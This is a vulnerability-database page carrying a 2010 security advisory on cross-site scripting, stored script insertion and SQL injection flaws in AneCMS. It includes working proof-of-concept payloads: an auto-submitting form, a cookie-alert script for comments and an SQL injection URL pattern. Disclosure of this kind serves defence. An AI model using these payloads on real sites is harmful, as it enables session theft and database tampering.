Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22406
HistoryMay 28, 2010 - 12:00 a.m.

Multiple Vulnerabilities in AneCMS

2010-05-2800:00:00
High-Tech Bridge
www.htbridge.com
39

0.002 Low

EPSS

Percentile

57.2%

JSON

High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in AneCMS which could be exploited to perform cross-site scripting and script insertion attacks and execute arbitrary SQL commands in application`s database.

  1. Cross-site scripting (XSS) vulnerability in AneCMS
    The vulnerability exists due to input sanitation error in the “descr” parameter in acp/pages/cfg.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation example:
    <form action=“http://demo.anecms.com/acp/?p=cfg&amp;m=smod” method=“post” name=“main” >
    <input type=“hidden” name=“title” value=“ANE CMS” />
    <input type=“hidden” name=“descr” value=‘A New Era of CMS DEMO "><script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“language” value=“it” />
    <input type=“hidden” name=“url_base” value=“http://demo.anecms.com/” />
    </form>
    <script>
    document.main.submit();
    </script>

  2. Script insertion vulnerability in AneCMS: CVE-2010-2437
    Input passed to the “comment” field is not properly sanitized before being stored in modules/blog/index.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when user views the malicious data.
    Exploitation example:
    To exploit this vulnerability fill in the comment field with the following text:
    hello <script>alert(document.cookie)</script>

  3. SQL injection vulnerability in AneCMS: CVE-2010-2436
    The vulnerability exists due to input sanitation error in URL in the modules/blog/index.php script. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    http://host/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63

CPENameOperatorVersion
anecmsle1.3

Related

nvd 2
cve 2
cvelist 2
prion 2
nvd
nvd
CVE-2010-2437
2010-06-24 17:30:01
CVE-2010-2436
2010-06-24 17:30:01
cve
cve
CVE-2010-2437
2010-06-24 17:30:01
CVE-2010-2436
2010-06-24 17:30:01
cvelist
cvelist
CVE-2010-2436
2010-06-24 17:00:00
CVE-2010-2437
2010-06-24 17:00:00
prion
prion
Cross site scripting
2010-06-24 17:30:00
Sql injection
2010-06-24 17:30:00

0.002 Low

EPSS

Percentile

57.2%

JSON
Related for HTB22406
nvd2cve2cvelist2prion2